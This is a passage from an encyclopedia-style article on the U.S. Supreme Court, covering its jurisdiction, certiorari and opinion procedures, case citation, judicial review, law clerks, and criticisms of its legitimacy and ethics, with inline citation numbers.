178 The resulting proceeding remains the only contempt proceeding and only criminal trial in the court's history. 179 180 The contempt proceeding arose from the lynching of Ed Johnson in Chattanooga, Tennessee the evening after Justice John Marshall Harlan granted Johnson a stay of execution to allow his lawyers to file an appeal. Johnson was removed from his jail cell by a lynch mob, aided by the local sheriff who left the prison virtually unguarded, and hanged from a bridge, after which a deputy sheriff pinned a note on Johnson's body reading: "To Justice Harlan. Come get your nigger now. 179 The local sheriff, John Shipp, cited the Supreme Court's intervention as the rationale for the lynching. The court appointed its deputy clerk as special master to preside over the trial in Chattanooga with closing arguments made in Washington before the Supreme Court justices, who found nine individuals guilty of contempt, sentencing three to 90 days in jail and the rest to 60 days in jail. 179 180 181 In all other cases, the court has only appellate jurisdiction, including the ability to issue writs of mandamus and writs of prohibition to lower courts. It considers cases based on its original jurisdiction very rarely; almost all cases are brought to the Supreme Court on appeal. In practice, the only original jurisdiction cases heard by the court are disputes between two or more states. 182 The court's appellate jurisdiction consists of appeals from federal courts of appeal (through certiorari, certiorari before judgment, and certified questions), 183 the United States Court of Appeals for the Armed Forces (through certiorari), 184 the Supreme Court of Puerto Rico (through certiorari), 185 the Supreme Court of the Virgin Islands (through certiorari), 186 the District of Columbia Court of Appeals (through certiorari), 187 and "final judgments or decrees rendered by the highest court of a State in which a decision could be had" (through certiorari). 187 In the last case, an appeal may be made to the Supreme Court from a lower state court if the state's highest court declined to hear an appeal or lacks jurisdiction to hear an appeal. For example, a decision rendered by one of the Florida District Courts of Appeal can be appealed to the U.S. Supreme Court if (a) the Supreme Court of Florida declined to grant certiorari, e.g. Florida Star v. B. J. F., or (b) the district court of appeal issued a per curiam decision simply affirming the lower court's decision without discussing the merits of the case, since the Supreme Court of Florida lacks jurisdiction to hear appeals of such decisions. 188 The power of the Supreme Court to consider appeals from state courts, rather than just federal courts, was created by the Judiciary Act of 1789 and upheld early in the court's history, by its rulings in Martin v. Hunter's Lessee (1816) and Cohens v. Virginia (1821). The Supreme Court is the only federal court that has jurisdiction over direct appeals from state court decisions, although there are several devices that permit so-called "collateral review" of state cases. It has to be noted that this "collateral review" often only applies to individuals on death row and not through the regular judicial system. 189 Since Article Three of the United States Constitution stipulates that federal courts may only entertain "cases" or "controversies", the Supreme Court cannot decide cases that are moot and it does not render advisory opinions, as the supreme courts of some states may do. For example, in DeFunis v. 
Odegaard (1974), the court dismissed a lawsuit challenging the constitutionality of a law school affirmative action policy because the plaintiff student had graduated since he began the lawsuit, and a decision from the court on his claim would not be able to redress any injury he had suffered. However, the court recognizes some circumstances where it is appropriate to hear a case that is seemingly moot. If an issue is "capable of repetition yet evading review", the court will address it even though the party before the court would not themselves be made whole by a favorable result. In Roe v. Wade (1973) and other abortion cases, the court addressed the merits of claims pressed by pregnant women seeking abortions even if they were no longer pregnant, because it takes longer than the typical human gestation period to appeal a case through the lower courts to the Supreme Court. Another mootness exception is voluntary cessation of unlawful conduct, in which the court considers the probability of recurrence and the plaintiff's need for relief. 190 The United States is divided into thirteen circuit courts of appeals, each of which is assigned a "circuit justice" from the Supreme Court. Although this concept has been in continuous existence throughout the history of the republic, its meaning has changed through time. Under the Judiciary Act of 1789, each justice was required to "ride circuit", or to travel within the assigned circuit and consider cases alongside local judges. This practice encountered opposition from many justices, who cited the difficulty of travel. Moreover, there was a potential for a conflict of interest on the court if a justice had previously decided the same case while riding circuit. Circuit riding ended in 1901, when the Circuit Court of Appeals Act was passed, and circuit riding was officially abolished by Congress in 1911. 191 The circuit justice for each circuit is responsible for dealing with certain types of applications that, by law and the rules of the court, may be addressed by a single justice. Ordinarily, a justice will resolve such an application by simply endorsing it "granted" or "denied" or entering a standard form of order; however, the justice may elect to write an opinion, referred to as an in-chambers opinion. Congress has specifically authorized one justice to issue a stay pending certiorari in 28 U.S.C. § 2101(f). Each justice also decides routine procedural requests, such as for extensions of time. Before 1990, the rules of the Supreme Court also stated that "a writ of injunction may be granted by any Justice in a case where it might be granted by the Court." 192 However, this part of the rule (and all other specific mention of injunctions) was removed in the Supreme Court's rules revision of December 1989. 193 194 Nevertheless, requests for injunctions under the All Writs Act are sometimes directed to the circuit justice. In the past, circuit justices also sometimes granted motions for bail in criminal cases, writs of habeas corpus, and applications for writs of error granting permission to appeal. 195 A circuit justice may sit as a judge on the Court of Appeals of that circuit, but over the past hundred years, this has rarely occurred. A circuit justice sitting with the Court of Appeals has seniority over the chief judge of the circuit.
196 The chief justice has traditionally been assigned to the District of Columbia Circuit, the Fourth Circuit (which includes Maryland and Virginia, the states surrounding the District of Columbia), and since it was established, the Federal Circuit. Each associate justice is assigned to one or two judicial circuits. As of September 28, 2022, the allotment of the justices among the circuits is as follows: 197 Five of the current justices are assigned to circuits on which they previously sat as circuit judges: Chief Justice Roberts (D.C. Circuit), Justice Sotomayor (Second Circuit), Justice Alito (Third Circuit), Justice Barrett (Seventh Circuit), and Justice Gorsuch (Tenth Circuit). Nearly all cases come before the court by way of petitions for writs of certiorari, commonly referred to as cert, upon which the court grants a writ of certiorari. The court may review via this process any civil or criminal case in the federal courts of appeals. 198 It may also review by certiorari a final judgment of the highest court of a state if the judgment involves a question of federal statutory or constitutional law. 199 A case may alternatively come before the court as a direct appeal from a three-judge federal district court. 200 The party that petitions the court for review is the petitioner and the non-mover is the respondent. Case names before the court are styled petitioner v. respondent, regardless of which party initiated the lawsuit in the trial court. For example, criminal prosecutions are brought in the name of the state and against an individual, as in State of Arizona v. Ernesto Miranda. If the defendant is convicted, and his conviction then is affirmed on appeal in the state supreme court, when he petitions for cert the name of the case becomes Miranda v. Arizona. The court also hears questions submitted to it by appeals courts themselves via a process known as certification. 198 The Supreme Court relies on the record assembled by lower courts for the facts of a case and deals solely with the question of how the law applies to the facts presented. There are however situations where the court has original jurisdiction, such as when two states have a dispute against each other, or when there is a dispute between the United States and a state. In such instances, a case is filed with the Supreme Court directly. Examples of such cases include United States v. Texas, a case to determine whether a parcel of land belonged to the United States or to Texas, and Virginia v. Tennessee, a case turning on whether an incorrectly drawn boundary between two states can be changed by a state court, and whether the setting of the correct boundary requires Congressional approval. Although it has not happened since 1794 in the case of Georgia v. Brailsford, 201 parties in an action at law in which the Supreme Court has original jurisdiction may request that a jury determine issues of fact. 202 Georgia v. Brailsford remains the only case in which the court has empaneled a jury, in this case a special jury. 203 Two other original jurisdiction cases involve colonial era borders and rights under navigable waters in New Jersey v. Delaware, and water rights between riparian states upstream of navigable waters in Kansas v. Colorado. A cert petition is voted on at a session of the court called conference. A conference is a private meeting of the nine justices by themselves; the public and the justices' clerks are excluded. The rule of four permits four of the nine justices to grant a writ of certiorari. 
If it is granted, the case proceeds to the briefing stage; otherwise, the case ends. Except in death penalty cases and other cases in which the court orders briefing from the respondent, the respondent may, but is not required to, file a response to the cert petition. The court grants a petition for cert only for "compelling reasons", spelled out in the court's Rule 10. Such reasons include: When a conflict of interpretations arises from differing interpretations of the same law or constitutional provision issued by different federal circuit courts of appeals, lawyers call this situation a "circuit split"; if the court votes to deny a cert petition, as it does in the vast majority of such petitions that come before it, it does so typically without comment. A denial of a cert petition is not a judgment on the merits of a case, and the decision of the lower court stands as the case's final ruling. To manage the high volume of cert petitions received by the court each year (of the more than 7,000 petitions the court receives each year, it will usually request briefing and hear oral argument in 100 or fewer), the court employs an internal case management tool known as the "cert pool"; currently, all justices except for Justices Alito and Gorsuch participate in the cert pool. 204 205 206 207 The Court also relies on and cites amicus briefs, law review articles, and other written works for their decisions. While law review article use has increased slightly with one article cited per decision on average, 208 the use of amicus briefs has increased significantly. 209 The use of amicus briefs has received criticism, including the ability of authors to discuss topics outside their expertise (unlike in lower courts), 209 with documented examples of falsehoods in written opinions, often supplied to the justices by amicus briefs from groups advocating a particular outcome. 210 The lack of funding transparency and the lack of a requirement to submit them earlier in the process also make it more difficult to fact-check and understand the credibility of amicus briefs. 209 When the court grants a cert petition, the case is set for oral argument. Both parties will file briefs on the merits of the case, as distinct from the reasons they may have argued for granting or denying the cert petition. With the consent of the parties or approval of the court, amici curiae, or "friends of the court", may also file briefs. The court holds two-week oral argument sessions each month from October through April. Each side has thirty minutes to present its argument (the court may choose to give more time, although this is rare), 211 and during that time, the justices may interrupt the advocate and ask questions. In 2019, the court adopted a rule generally allowing advocates to speak uninterrupted for the first two minutes of their argument. 212 The petitioner gives the first presentation, and may reserve some time to rebut the respondent's arguments after the respondent has concluded. Amici curiae may also present oral argument on behalf of one party if that party agrees. The court advises counsel to assume that the justices are familiar with and have read the briefs filed in a case. At the conclusion of oral argument, the case is submitted for decision. Cases are decided by majority vote of the justices. After the oral argument is concluded, usually in the same week as the case was submitted, the justices retire to another conference at which the preliminary votes are tallied and the court sees which side has prevailed. 
One of the justices in the majority is then assigned to write the court's opinion, also known as the "majority opinion", an assignment made by the most senior justice in the majority, with the chief justice always being considered the most senior. Drafts of the court's opinion circulate among the justices until the court is prepared to announce the judgment in a particular case. 213 Justices are free to change their votes on a case up until the decision is finalized and published. In any given case, a justice is free to choose whether or not to author an opinion or else simply join the majority or another justice's opinion. There are several primary types of opinions, including majority (or plurality) opinions, concurrences, dissents, and per curiam opinions. It is the court's practice to issue decisions in all cases argued in a particular term by the end of that term. Within that term, the court is under no obligation to release a decision within any set time after oral argument. Since recording devices are banned inside the courtroom of the Supreme Court Building, the delivery of the decision to the media has historically been done via paper copies in what was known as the "Running of the Interns". 214 However, this practice has become passé as the Court now posts electronic copies of the opinions on its website as they are being announced. 215 It is possible that through recusals or vacancies the court divides evenly on a case. If that occurs, then the decision of the court below is affirmed, but does not establish binding precedent. In effect, it results in a return to the status quo ante. For a case to be heard, there must be a quorum of at least six justices. 216 If a quorum is not available to hear a case and a majority of qualified justices believes that the case cannot be heard and determined in the next term, then the judgment of the court below is affirmed as if the court had been evenly divided. For cases brought to the Supreme Court by direct appeal from a United States District Court, the chief justice may order the case remanded to the appropriate U.S. Court of Appeals for a final decision there. 217 This has only occurred once in U.S. history, in the case of United States v. Alcoa (1945). 218 The court's opinions are published in three stages. First, a slip opinion is made available on the court's website and through other outlets. Next, several opinions and lists of the court's orders are bound together in paperback form, called a preliminary print of United States Reports, the official series of books in which the final version of the court's opinions appears. About a year after the preliminary prints are issued, a final bound volume of U.S. Reports is issued by the Reporter of Decisions. The individual volumes of U.S. Reports are numbered so that users may cite this set of reports (or a competing version published by another commercial legal publisher but containing parallel citations) to allow those who read their pleadings and other briefs to find the cases quickly and easily. As of March 2012, the U.S. Reports had published a total of 30,161 Supreme Court opinions, covering the decisions handed down from February 1790 to March 2012. This figure does not reflect the number of cases the court has taken up, as several cases can be addressed by a single opinion (see, for example, Parents v. Seattle, where Meredith v. Jefferson County Board of Education was also decided in the same opinion; by a similar logic, Miranda v. Arizona actually decided not only Miranda but also three other cases: Vignera v.
New York, Westover v. United States, and California v. Stewart). A more unusual example is The Telephone Cases, which are a single set of interlinked opinions that take up the entire 126th volume of the U.S. Reports. Opinions are also collected and published in two unofficial, parallel reporters: Supreme Court Reporter, published by West (now a part of Thomson Reuters), and United States Supreme Court Reports, Lawyers' Edition (simply known as Lawyers' Edition), published by LexisNexis. In court documents, legal periodicals, and other legal media, case citations generally contain cites from each of the three reporters; for example, a citation to Citizens United v. Federal Election Commission is presented as Citizens United v. Federal Election Com'n, 558 U.S. 310, 130 S. Ct. 876, 175 L. Ed. 2d 753 (2010), with "S. Ct." representing the Supreme Court Reporter, and "L. Ed." representing the Lawyers' Edition. 222 223 Lawyers use an abbreviated format to cite cases, in the form "vol U.S. page, pin (year)", where vol is the volume number, page is the page number on which the opinion begins, and year is the year in which the case was decided. Optionally, pin is used to "pinpoint" to a specific page number within the opinion. For instance, the citation for Roe v. Wade is 410 U.S. 113 (1973), which means the case was decided in 1973 and appears on page 113 of volume 410 of U.S. Reports. For opinions or orders that have not yet been published in the preliminary print, the volume and page numbers may be replaced with blanks. In order to plead before the court, an attorney must first be admitted to the court's bar. Approximately 4,000 lawyers join the bar each year. The bar contains an estimated 230,000 members. In reality, pleading is limited to several hundred attorneys. The rest join for a one-time fee of $200, with the court collecting about $750,000 annually. Attorneys can be admitted as either individuals or as groups. The group admission is held before the current justices of the Supreme Court, wherein the chief justice approves a motion to admit the new attorneys. 224 Lawyers commonly apply for the cosmetic value of a certificate to display in their office or on their resume. They also receive access to better seating if they wish to attend an oral argument. 225 Members of the Supreme Court Bar are also granted access to the collections of the Supreme Court Library. 226 A term of the Supreme Court commences on the first Monday of each October, and continues until June or early July of the following year. Each term consists of alternating periods of around two weeks known as "sittings" and "recesses"; justices hear cases and deliver rulings during sittings, and discuss cases and write opinions during recesses. 227 The federal court system and the judicial authority to interpret the Constitution received little attention in the debates over the drafting and ratification of the Constitution. The power of judicial review, in fact, is nowhere mentioned in it. Over the ensuing years, the question of whether the power of judicial review was even intended by the drafters of the Constitution was quickly frustrated by the lack of evidence bearing on the question either way. 228 Nevertheless, the power of the judiciary to overturn laws and executive actions it determines are unlawful or unconstitutional is a well-established precedent. Many of the Founding Fathers accepted the notion of judicial review; in Federalist No.
78, Alexander Hamilton wrote: "A Constitution is, in fact, and must be regarded by the judges, as a fundamental law. It therefore belongs to them to ascertain its meaning, and the meaning of any particular act proceeding from the legislative body. If there should happen to be an irreconcilable variance between the two, that which has the superior obligation and validity ought, of course, to be preferred; or, in other words, the Constitution ought to be preferred to the statute. The Supreme Court established its own power to declare laws unconstitutional in Marbury v. Madison (1803), consummating the American system of checks and balances. In explaining the power of judicial review, Chief Justice John Marshall stated that the authority to interpret the law was the particular province of the courts, part of the duty of the judicial department to say what the law is. His contention was not that the court had privileged insight into constitutional requirements, but that it was the constitutional duty of the judiciary, as well as the other branches of government, to read and obey the dictates of the Constitution. 228 This decision was criticized by then-President Thomas Jefferson who said, "the Constitution, on this hypothesis, is a mere thing of wax in the hands of the judiciary, which they may twist and shape into any form they please. 229 Since the founding of the republic, there has been a tension between the practice of judicial review and the democratic ideals of egalitarianism, self-government, self-determination and freedom of conscience. At one pole are those who view the federal judiciary and especially the Supreme Court as being "the most separated and least checked of all branches of government. 230 Indeed, federal judges and justices on the Supreme Court are not required to stand for election by virtue of their tenure "during good behavior", and their pay may "not be diminished" while they hold their position (Section 1 of Article Three). Although subject to the process of impeachment, only one justice has ever been impeached and no Supreme Court justice has been removed from office. At the other pole are those who view the judiciary as the least dangerous branch, with little ability to resist the exhortations of the other branches of government. 228 The Supreme Court cannot directly enforce its rulings; instead, it relies on respect for the Constitution and for the law for adherence to its judgments. One notable instance of nonacquiescence came in 1832, when the state of Georgia ignored the Supreme Court's decision in Worcester v. Georgia. President Andrew Jackson, who sided with the Georgia courts, is supposed to have remarked, "John Marshall has made his decision; now let him enforce it 231 Some state governments in the South also resisted the desegregation of public schools after the 1954 judgment Brown v. Board of Education. More recently, many feared that President Nixon would refuse to comply with the court's order in United States v. Nixon (1974) to surrender the Watergate tapes. 232 Nixon ultimately complied with the Supreme Court's ruling. 233 Supreme Court decisions can be purposefully overturned by constitutional amendment, something that has happened on six occasions: 234 When the court rules on matters involving the interpretation of laws rather than of the Constitution, simple legislative action can reverse the decisions (for example, in 2009 Congress passed the Lilly Ledbetter Fair Pay Act of 2009, superseding the limitations given in Ledbetter v. 
Goodyear Tire & Rubber Co. in 2007). Also, the Supreme Court is not immune from political and institutional consideration: lower federal courts and state courts sometimes resist doctrinal innovations, as do law enforcement officials. 235 In addition, the other two branches can restrain the court through other mechanisms. Congress can increase the number of justices, giving the president power to influence future decisions by appointments (as in Roosevelt's court-packing plan discussed above). Congress can pass legislation that restricts the jurisdiction of the Supreme Court and other federal courts over certain topics and cases: this is suggested by language in Section 2 of Article Three, where the appellate jurisdiction is granted "with such Exceptions, and under such Regulations as the Congress shall make." The court sanctioned such congressional action in the Reconstruction Era case Ex parte McCardle (1869), although it rejected Congress' power to dictate how particular cases must be decided in United States v. Klein (1871). 236 On the other hand, through its power of judicial review, the Supreme Court has defined the scope and nature of the powers and separation between the legislative and executive branches of the federal government; for example, in United States v. Curtiss-Wright Export Corp. (1936), Dames & Moore v. Regan (1981), and notably in Goldwater v. Carter (1979), which effectively gave the presidency the power to terminate ratified treaties without the consent of Congress. The court's decisions can also impose limitations on the scope of Executive authority, as in Humphrey's Executor v. United States (1935), the Steel Seizure Case (1952), and United States v. Nixon (1974). Each Supreme Court justice hires several law clerks to review petitions for writs of certiorari, research them, prepare bench memorandums, and draft opinions. Associate justices are allowed four clerks. The chief justice is allowed five clerks, but Chief Justice Rehnquist hired only three per year, and Chief Justice Roberts usually hires only four. 237 Generally, law clerks serve a term of one to two years. The first law clerk was hired by Associate Justice Horace Gray in 1882. 237 238 Oliver Wendell Holmes Jr. and Louis Brandeis were the first Supreme Court justices to use recent law school graduates as clerks, rather than hiring "a stenographer-secretary." 239 Most law clerks are recent law school graduates. The first female clerk was Lucile Lomen, hired in 1944 by Justice William O. Douglas. 237 The first African-American, William T. Coleman Jr., was hired in 1948 by Justice Felix Frankfurter. 237 A disproportionately large number of law clerks have obtained law degrees from elite law schools, especially Harvard, Yale, the University of Chicago, Columbia, and Stanford. From 1882 to 1940, 62% of law clerks were graduates of Harvard Law School. 237 Those chosen to be Supreme Court law clerks usually have graduated at the top of their law school class and were often an editor of the law review or a member of the moot court board. By the mid-1970s, clerking previously for a judge in a federal court of appeals had also become a prerequisite to clerking for a Supreme Court justice. Ten Supreme Court justices previously clerked for other justices: Byron White for Frederick M. Vinson, John Paul Stevens for Wiley Rutledge, William Rehnquist for Robert H.
Jackson, Stephen Breyer for Arthur Goldberg, John Roberts for William Rehnquist, Elena Kagan for Thurgood Marshall, Neil Gorsuch for both Byron White and Anthony Kennedy, Brett Kavanaugh also for Kennedy, Amy Coney Barrett for Antonin Scalia, and Ketanji Brown Jackson for Stephen Breyer. Justices Gorsuch and Kavanaugh served under Kennedy during the same term. Gorsuch is the first justice to clerk for and subsequently serve alongside the same justice, serving alongside Kennedy from April 2017 through Kennedy's retirement in 2018. With the confirmation of Justice Kavanaugh, for the first time a majority of the Supreme Court was composed of former Supreme Court law clerks (Roberts, Breyer, Kagan, Gorsuch and Kavanaugh, now joined by Barrett and Jackson). Several current Supreme Court justices have also clerked in the federal courts of appeals: John Roberts for Judge Henry Friendly of the United States Court of Appeals for the Second Circuit, Justice Samuel Alito for Judge Leonard I. Garth of the United States Court of Appeals for the Third Circuit, Elena Kagan for Judge Abner J. Mikva of the United States Court of Appeals for the District of Columbia Circuit, Neil Gorsuch for Judge David B. Sentelle of the United States Court of Appeals for the District of Columbia, Brett Kavanaugh for Judge Walter Stapleton of the United States Court of Appeals for the Third Circuit and Judge Alex Kozinski of the United States Court of Appeals for the Ninth Circuit, and Amy Coney Barrett for Judge Laurence Silberman of the U.S. Court of Appeals for the D.C. Circuit. Clerks hired by each of the justices of the Supreme Court are often given considerable leeway in the opinions they draft. "Supreme Court clerkship appeared to be a nonpartisan institution from the 1940s into the 1980s, according to a study published in 2009 by the law review of Vanderbilt University Law School. 240 241 "As law has moved closer to mere politics, political affiliations have naturally and predictably become proxies for the different political agendas that have been pressed in and through the courts, former federal court of appeals judge J. Michael Luttig said. 240 David J. Garrow, professor of history at the University of Cambridge, stated that the court had thus begun to mirror the political branches of government. "We are getting a composition of the clerk workforce that is getting to be like the House of Representatives, Professor Garrow said. "Each side is putting forward only ideological purists. 240 According to the Vanderbilt Law Review study, this politicized hiring trend reinforces the impression that the Supreme Court is "a superlegislature responding to ideological arguments rather than a legal institution responding to concerns grounded in the rule of law. 240 The following are some of the criticisms and controversies about the Court that are not discussed in previous sections. Unlike in most high courts, the United States Supreme Court has lifetime tenure, an unusual amount of power over elected branches of government, and a difficult constitution to amend. 242 These, among other factors, have been attributed by some critics to the Court's diminished stature abroad 243 and lower approval ratings at home, which have dropped from the mid 60s in the late 1980s to around 40% in the early 2020s. 
Additional factors cited by critics include the polarization of national politics, ethics scandals, and specific controversial partisan rulings, including the relaxation of campaign finance rules, 244 increased gerrymandering, 245 weakened voting rights, 246 Dobbs v. Jackson and Bush v. Gore. 247 The continued consolidation of power by the court and, as a result of its rulings, the Republican Party, has sparked debate over when democratic backsliding becomes entrenched single-party rule. 247 Public trust in the court peaked in the late 1980s. Since the 2022 Dobbs ruling that overturned Roe v. Wade and permitted states to restrict abortion rights, Democrats and independents have increasingly lost trust in the court, seen the court as political, and expressed support for reforming the institution. 248 Historically, the court had relatively more trust than other government institutions. 249 After recording recent high approval ratings in the late 1980s around 66% approval, 250 the court's ratings have declined to an average of around 40% between mid 2021 and February 2024. 251 The electoral college (which elects the President who nominates the justices) and the U.S. Senate which confirms the justices, have selection biases that favor rural states that tend to vote Republican, resulting in a conservative Supreme Court. 252 Ziblatt and Levitsky estimate that 3 or 4 of the seats held by conservative justices on the court would be held by justices appointed by a Democratic president if the Presidency and Senate were selected directly by the popular vote. 253 The three Trump appointees to the court were all nominated by a president who finished second in the popular vote and confirmed by Senators representing a minority of Americans. 254 In addition, Clarence Thomas' confirmation in 1991 and Merrick Garland's blocked confirmation in 2016 were both decided by senators representing a minority of Americans. 255 Greg Price also critiqued the Court as minority rule. 256 Moreover, the Federalist Society acted as a filter for judicial nominations during the Trump administration, 257 ensuring the latest conservative justices lean even further to the right. 252 86% of judges Trump appointed to circuit courts and the Supreme Court were Federalist Society members. 258 David Litt critiques it as "an attempt to impose rigid ideological dogma on a profession once known for intellectual freedom. 259 Kate Aronoff criticizes the donations from special interests like fossil fuel companies and other dark money groups to the Federalist Society and related organizations seeking to influence lawyers and Supreme Court Justices. 260 The 2016 stonewalling of Merrick Garland's confirmation and subsequent filling with Neil Gorsuch has been critiqued as a 'stolen seat' citing precedent from the 20th century of confirmations during election years, 261 262 while proponents cited three blocked nominations between 1844 and 1866. 263 In recent years, Democrats have accused Republican leaders such as Mitch McConnell of hypocrisy, as they were instrumental in blocking the nomination of Merrick, but then rushing through the appointment of Amy Coney Barrett, even though both vacancies occurred close to an election. 264 Ethical controversies have grown with reports of justices (and their close family members) accepting expensive gifts, travel, business deals, and speaking fees without oversight or recusals from cases that present conflicts of interest. 
265 266 267 268 269 270 271 Spousal income and connections to cases have been redacted from the Justices' ethical disclosure forms, 272 while justices, such as Samuel Alito and Clarence Thomas, failed to disclose many large financial gifts, including free vacations valued at as much as $500,000. 273 274 In 2024, Justices Alito and Thomas refused calls to recuse themselves from January 6th cases where their spouses have taken public stances or been involved in efforts to overturn the election. 275 276 277 278 The criticism intensified after the 2024 Trump v. United States decision granted broad immunity to presidents, with Representative Alexandria Ocasio-Cortez saying she would introduce impeachment articles when Congress is back in session. 279 On July 10, 2024, she filed Articles of Impeachment against Thomas and Alito, citing their "widely documented financial and personal entanglements." 280 281 282 283 As of late July 2024, nearly 1.4 million people had signed a moveon.org petition asking Congress to remove Justice Thomas. 284 285 President Biden proposed term limits for justices, an enforceable ethics code, and elimination of "immunity for crimes a former president committed while in office". 286 287 288 Yale professor of constitutional law Akhil Reed Amar wrote an op-ed for The Atlantic titled Something Has Gone Deeply Wrong at the Supreme Court. 289 Other criticisms of the Court include weakening corruption laws impacting branches beyond the judiciary 290 291 and citing falsehoods in written opinions, often supplied to the justices by amicus briefs from groups advocating a particular outcome. 210 Allison Orr Larsen, Associate Dean at William & Mary Law School, wrote in Politico that the court should address this by requiring disclosure of all funders of amicus briefs and the studies they cite, admitting only briefs that stay within the expertise of the authors (as is required in lower courts), and requiring the briefs to be submitted much earlier in the process so the history and facts have time to be challenged and uncovered. 209 The Supreme Court Historical Society's controversies include fundraising done by the Justices from corporations and wealthy donors apparently seeking access to the justices. 292 293 294 295 On November 13, 2023, the court issued its first-ever Code of Conduct for Justices of the Supreme Court of the United States to set "ethics rules and principles that guide the conduct of the Members of the Court." 296 297 The Code has been received by some as a significant first step, 298 but it does not address the ethics concerns of many notable critics, who found the Code to be a significantly weakened version of the rules for other federal judges, let alone the legislature and the executive branch, while also lacking an enforcement mechanism. 299 300 301 The Code's commentary denied past wrongdoing by saying that the Justices have largely abided by these principles and are simply publishing them now. 302 303 304 This has prompted some criticism that the court hopes to legitimize past and future scandals through this Code. 305 306 The ethics rules guiding the justices are set and enforced by the justices themselves, meaning the members of the court have no external checks on their behavior other than the impeachment of a justice by Congress. 307 308 Chief Justice Roberts refused to testify before the Senate Judiciary Committee in April 2023, reasserting his desire for the Supreme Court to continue to monitor itself despite mounting ethics scandals.
309 Judges on lower courts, by contrast, are disciplined according to the 1973 Code of Conduct for U.S. judges, which is enforced by the Judicial Conduct and Disability Act of 1980. 307 Article III, Section 1 of the Constitution of the United States establishes that the justices hold their office during good behavior. Thus far, only one justice (Associate Justice Samuel Chase in 1804) has ever been impeached, and none has ever been removed from office. 310 The lack of external enforcement of ethics or other conduct violations makes the Supreme Court an outlier in modern organizational best practices. 307 Reform legislation proposed in 2024 has been blocked by congressional Republicans. 278 Thomas Keck argues that because the Court has historically not served as a strong bulwark for democracy, the Roberts Court has the opportunity to go down in history as a defender of democracy. However, he believes that if the court shields Trump from criminal prosecution (after ensuring his access to the ballot), then the risks that come with an anti-democratic status quo of the current court will outweigh the dangers that come from court reform (including court packing). 311 Aziz Z. Huq points to the blocking of progress toward democratizing institutions, the increasing disparity in wealth and power, and the empowering of an authoritarian white nationalist movement as evidence that the Supreme Court has created a "permanent minority" incapable of being defeated democratically. 312 Slate published an op-ed on July 3, 2024, by Dahlia Lithwick and Mark Joseph Stern criticizing several recent decisions, stating: "The Supreme Court's conservative supermajority has, in recent weeks, restructured American democracy in the Republican Party's preferred image, fundamentally altering the balance of power between the branches and the citizens themselves.... In the course of its most recent term that conservative supermajority has created a monarchical presidency, awarding the chief executive near-insurmountable immunity from accountability for any and all crimes committed during a term in office. It has seized power from Congress, strictly limiting lawmakers' ability to write broad laws that tackle the major crises of the moment. And it has hobbled federal agencies' authority to apply existing statutes to problems on the ground, substituting the expert opinions of civil servants with the (often partisan) preferences of unelected judges. All the while, the court has placed itself at the apex of the state, agreeing to share power only with a strongman president who seeks to govern in line with the conservative justices' vision." 313 Some of the most notable historical decisions that were criticized for failing to protect individual rights include the Dred Scott (1857) decision, which said people of African descent could not be U.S. citizens or enjoy constitutionally protected rights and privileges, 314 Plessy v. Ferguson (1896), which upheld segregation under the doctrine of separate but equal, 315 and the Civil Rights Cases (1883) and Slaughter-House Cases (1873), which all but undermined civil rights legislation enacted during the Reconstruction era. 316 However, others argue that the court is too protective of some individual rights, particularly those of people accused of crimes or in detention. For example, Chief Justice Warren Burger criticized the exclusionary rule, and Justice Scalia criticized Boumediene v. Bush for being too protective of the rights of Guantanamo detainees, arguing habeas corpus should be limited to sovereign territory.
317 After Dobbs v. Jackson Women's Health Organization overturned nearly 50 years of precedent set by Roe v. Wade, some experts expressed concern that this may be the beginning of a rollback of individual rights that had been previously established under the substantive due process principle, in part because Justice Clarence Thomas wrote in his concurring opinion in Dobbs that the decision should prompt the court to reconsider all of the court's past substantive due process decisions. 318 Due process rights claimed to be at risk include access to contraception (Griswold v. Connecticut), same-sex intimacy (Lawrence v. Texas), and same-sex marriage (Obergefell v. Hodges). 318 Some experts, such as Melissa Murray, law professor at N.Y.U. School of Law, have claimed that protections for interracial marriage, established in Loving v. Virginia (1967), may also be at risk. 319 Other experts, such as Josh Blackman, law professor at South Texas College of Law Houston, argued that Loving actually relied more heavily upon Equal Protection Clause grounds than substantive due process. 320 Substantive due process has also been the primary vehicle used by the Supreme Court to incorporate the Bill of Rights against state and local governments. 321 Clarence Thomas referred to it as a 'legal fiction,' 322 preferring the Privileges or Immunities Clause for incorporating the Bill of Rights. 323 However, outside of Neil Gorsuch's commentary in Timbs v. Indiana, Thomas has received little support for this viewpoint. 324 The Supreme Court has been criticized for engaging in judicial activism. This criticism is leveled by those who believe the court should not interpret the law in any way besides through the lens of past precedent or textualism. However, those on both sides of the political aisle often level this accusation at the court. The debate around judicial activism typically involves accusing the other side of activism, while denying that one's own side engages in it. 325 326 Conservatives often cite the decision in Roe v. Wade (1973) as an example of liberal judicial activism. In its decision, the court legalized abortion on the basis of a "right to privacy" that it found inherent in the Due Process Clause of the Fourteenth Amendment. 327 Roe v. Wade was overturned nearly fifty years later by Dobbs v. Jackson (2022), ending the recognition of abortion access as a constitutional right and returning the issue of abortion to the states. David Litt criticized the decision in Dobbs as activism on the part of the court's conservative majority because the court failed to respect past precedent, eschewing the principle of stare decisis that usually guides the court's decisions. 328 The decision in Brown v. Board of Education, which banned racial segregation in public schools, was also criticized as activist by conservatives Pat Buchanan, 329 Robert Bork, 330 and Barry Goldwater. 331 More recently, Citizens United v. Federal Election Commission was criticized for expanding upon the precedent in First National Bank of Boston v. Bellotti (1978) that the First Amendment applies to corporations. 332 Foreign Policy writer Colm Quinn says that a criticism leveled at the court, as well as other American institutions, is that after two centuries they are beginning to look their age. He cites four features of the United States Supreme Court that make it different from high courts in other countries and that help explain why polarization is an issue in the United States court. 333 Adam Liptak wrote in 2008 that the court has declined in relevance among constitutional courts in other countries.
